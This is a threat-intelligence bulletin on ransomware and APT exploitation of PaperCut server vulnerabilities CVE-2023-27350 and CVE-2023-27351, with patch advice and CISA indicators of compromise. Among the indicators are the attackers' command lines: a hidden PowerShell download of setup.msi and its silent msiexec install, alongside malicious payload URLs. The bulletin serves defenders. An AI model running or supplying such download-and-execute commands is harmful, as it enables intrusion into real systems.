Get in Touch

Get in Touch

Get in Touch

Please get in touch using the form below.

Close form

Home / Threat Intelligence bulletins / Threat actors actively exploiting critical PaperCut server vulnerabilities

Update – PaperCut vulnerability targeted by ransomware gang – 12th May 2023

Updated Target Industry

Education sector.

Overview

A joint advisory was released by the FBI and the Cybersecurity & Infrastructure Security Agency (CISA) regarding the Bl00dy ransomware gang targeting the education sector by leveraging the previously disclosed PaperCut vulnerability, tracked as CVE-2023-27350.

Updated Impact

The associated ransomware operations have allowed threat actors to encrypt and exfiltrate data from target systems.

Updated Containment, Mitigations & Remediations

The recent reporting indicates that some organisations, particularly in the education sector, have yet to apply the security updates which address CVE-2023-27350. As a reminder, it is strongly recommended that the PaperCut NG and MF update versions 20.1.7, 21.2.11, and 22.0.9 are applied as soon as possible.

Updated Indicators of Compromise (IoCs)

The following list of Indicators of Compromise were released within the CISA advisory:

Bl00dy ransomware gang associated email addresses:

– decrypt.support@privyonline[.]com

– fimaribahundqf@gmx[.]com

– main-office@data-highstream[.]com

– prepalkeinuc0u@gmx[.]com

– tpyrcne@onionmail[.]org

Bl00dy ransomware gang associated IP addresses:

– 102.130.112[.]157

– 172.106.112[.]46

– 176.97.76[.]163

– 192.160.102[.]164

– 194.87.82[.]7

– 195.123.246[.]20

– 198.50.191[.]95

– 206.197.244[.]75

– 216.122.175[.]114

– 46.4.20[.]30

– 5.188.206[.]14

– 5.8.18[.]233

– 5.8.18[.]240

– 80.94.95[.]103

– 89.105.216[.]106

– 92.118.36[.]199

Bl00dy ransomware gang associated domains:

– anydeskupdate[.]com

– anydeskupdates[.]com

– ber6vjyb[.]com

– netviewremote[.]com

– study.abroad[.]ge

– upd343.winserverupdates[.]com

– upd488.windowservicecemter[.]com

– upd488.windowservicecemter[.]com/download/update.dll

– updateservicecenter[.]com

– windowcsupdates[.]com

– windowservicecemter[.]com

– windowservicecentar[.]com

– windowservicecenter[.]com

– winserverupdates[.]com

– winserverupdates[.]com

Bl00dy ransomware gang associated command lines:

– cmd /c “powershell.exe -nop -w hidden

– Invoke-WebRequest ‘<url>/setup.msi’ -OutFile ‘setup.msi’ ”

– cmd /c “msiexec /i setup.msi /qn IntegratorLogin=<email_address> CompanyId=1”

Bl00dy ransomware gang associated file hashes (SHA256):

– 6bb160ebdc59395882ff322e67e000a22a5c54ac777b6b1f10f1fef381df9c15

– c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125

– 0ce7c6369c024d497851a482e011ef1528ad270e83995d52213276edbe71403f

Updated Threat Group

As well as the Bl00dy ransomware gang, the Iranian nation-state sponsored advanced persistent threat (APT) group, tracked as Mango Sandstorm (also known as MuddyWater), has also been reported to have leveraged CVE-2023-27350 to execute remote code on target systems.

Updated Further Information

CISA Advisory

Update – PaperCut attacks attributed to Clop and LockBit ransomware operators – 26th April 2023

Overview

Microsoft has attributed the recent PaperCut server attacks to Clop and LockBit ransomware operations. The related campaigns pertain to the two PaperCut vulnerabilities, tracked as CVE-2023–27350 / ZDI-CAN-18987 / PO-1216 and CVE-2023–27351 / ZDI-CAN-19226 / PO-1219, that were disclosed earlier this month. The ransomware groups have exploited these vulnerabilities to harvest data from vulnerable PaperCut servers, starting on 13th April 2023.

Updated Threat Group

Microsoft declared that the threat group behind the Clop and LockBit ransomware operations exploiting the PaperCut vulnerabilities is being tracked as Lace Tempest, the activity of which correlates to that of the FIN11 and TA505 threat actor groups.

Updated Threat Landscape

Vulnerable PaperCut server exploitation fits the attack profile of the Clop ransomware group. The ransomware group has explicitly stated that they prefer to harvest data to extort their victims. Such a method was recently observed with the threat actor group exploiting zero-day vulnerabilities in the GoAnywhere MFT platform to harvest corporate data.

Given that PaperCut servers contain operative features that allows print jobs and associated documents to be saved, they are a prime target for threat actors seeking opportunities for data exfiltration.

Updated Further Information

Vulnera article

Update – Potential Russian threat actor involvement in PaperCut vulnerability exploitation – 24th April 2023 

Overview 

The recently disclosed PaperCut server vulnerability, tracked as CVE-2023-27350 (CVSS score – 9.8: Critical) has been added to the Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) Catalog, due to evidence of active exploitation. Within exposed servers, PowerShell commands have been observed as being spawned from PaperCut software to install remote management and maintenance (RMM) software for the purpose of persistence and code execution on target hosts. 

Updated Indicators of Compromise 

File hashes (SHA256): 

– f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb 

– c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125 

Domains: 

– upd488[.]windowservicecemter[.]com/download/ld.txt 

– upd488[.]windowservicecemter[.]com/download/AppPrint.msi 

– upd488[.]windowservicecemter[.]com/download/a2.msi 

– upd488[.]windowservicecemter[.]com/download/a3.msi 

– anydeskupdate[.]com 

– anydeskupdates[.]com 

– netviewremote[.]com 

– updateservicecenter[.]com 

– windowcsupdates[.]com 

– windowservicecentar[.]com 

– windowservicecenter[.]com 

– winserverupdates[.]com 

Updated Threat Actor 

A list of Indicators of Compromise has been released, analysis of which led to the discovery that one of the domains (windowservicecemter[.]com) also hosts the TrueBot malware variant. However, at the time of disclosure, it should be noted that the software developer stated that TrueBot malware deployment has not been detected.  

Connections exist between TrueBot malware and Evil Corp, with its threat group cluster, “TA505”, who have previously distributed Clop ransomware. However, at the time of writing, it should be noted that whilst there is a realistic possibility that such an attribution could be made, this remains in the realm of speculation. 

Please refer to the Clop ransomware report on the “Malware Reports” section of threat intelligence page of Quorum Cyber website for further details.  

Updated Threat Landscape 

The objective of the current PaperCut exploitation campaign remains unknown. However, the potential link to second-stage ransomware distribution should be highlighted as a concern.  

Updated Further Information 

PaperCut Advisory

CISA Known Exploited Vulnerabilities Catalog

Target Industry

Indiscriminate, opportunistic targeting.

Overview

PaperCut has disclosed that threat actors are actively exploiting two security vulnerabilities to gain access to vulnerable servers. The first is tracked as ZDI-CAN-18987 / PO-1216 (CVSS v3.1 score: 9.8 – critical) and pertains to an unauthenticated remote code execution flaw for both application and site servers. The second, tracked as ZDI-CAN-19226 / PO-1219 (CVSS v3.1 score: 8.2 – high), relates to an unauthenticated information disclosure flaw on all OS platforms for application servers.

The software developer announced that both vulnerabilities have been detected as being actively exploited in the wild by cyber threat actors.

Impact

– Successful exploitation of ZDI-CAN-18987 / PO-1216 would allow an unauthenticated threat actor to attain remote code execution (RCE) capabilities on a PaperCut application server, without the required log-in.
– Successful exploitation of ZDI-CAN-19226 / PO-1219 would allow an unauthenticated threat actor to retrieve data regarding a user stored within PaperCut MF or NG – including usernames, full names, email addresses, office/department information and any card numbers associated with the user. The threat actor could also retrieve the hashed passwords for internal PaperCut-created users only.

Vulnerability Detection

Papercut has released a patch for these vulnerabilities as it relates to the respective product versions. As such, previous versions are vulnerable to potential exploit.

Affected Products

– ZDI-CAN-18987 / PO-1216: All PaperCut MF or NG versions 8.0 or later on all OS platforms, for both application and site servers.
– ZDI-CAN-19226 / PO-1219: All PaperCut MF or NG versions 15.0 or later on all OS platforms for application servers.

Containment, Mitigations & Remediations

It is strongly recommended that PaperCut users upgrade to Papercut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9 and later.

It should be noted that software versions prior to version 19 have reached their end of life (EoL) and are no longer supported and so no security updates will be released for these versions. In such cases, it is recommended that organisations purchase an updated licence if possible.

No workarounds are currently available for ZDI-CAN-18987 / PO-1216. However, ZDI-CAN-19226 / PO-1219 can be mitigated by applying the “Allow list” restrictions by following the steps below:

– Navigate to “Options” > “Advanced” > “Security” > “Allowed site server IP addresses”.

Within the latter option, set this to only allow the IP addresses of verified site servers to the network.

Indicators of Compromise

At the time of writing, there is no method to determine whether or not a vulnerable PaperCut product has been compromised. However, PaperCut have set out a recommended series of steps to follow that administrators can pursue to investigate potential compromise:

– Search for suspicious activity in Logs > Application Log, within the PaperCut admin interface
– Remain vigilant for any updates from a user named “setup wizard”
– Search for new users being created or other configuration keys being tampered with
– If the application server logs are in debug mode, search for any instances mentioning “SetupCompleted” at a timestamp not correlating with the server installation or upgrade.

It must be emphasised that while the steps mentioned above could potentially reveal malicious activity, it remains possible that threat actors could have removed traces of their operations from the associated logs. As such, administrators that suspect server compromise are advised to follow the steps below:

– Create back-ups
– Wipe the application server
– Rebuild the configuration from a safe back-up point.

Threat Landscape

PaperCut creates printing management software compatible with all major platforms. It is used by state organisations and education institutes. The software developer also provides services for hundreds of millions of customers in over 100 countries. PaperCut also occupies a significant proportion of the print management market share. Given that threat actors generally utilise a combination of probability and asset value to determine which attack surfaces to focus on, PaperCut products could emerge as a consistent target. Due to the fact that PaperCut products have become an integral aspect of business operations, threat actors will continue to exploit vulnerabilities contained within the associated products in an attempt to extract the sensitive data contained therein.

Threat Group

No attribution to specific threat actors or groups has been identified at the time of this writing.

Mitre Methodologies

Tactic:
TA0002 – Execution

Execution Technique:
T1210 – Exploitation of Remote Services

Tactic:
TA0006 – Credential Access

Credential Access Technique:
T1003 – OS Credential Dumping

Further Information

PaperCut Advisory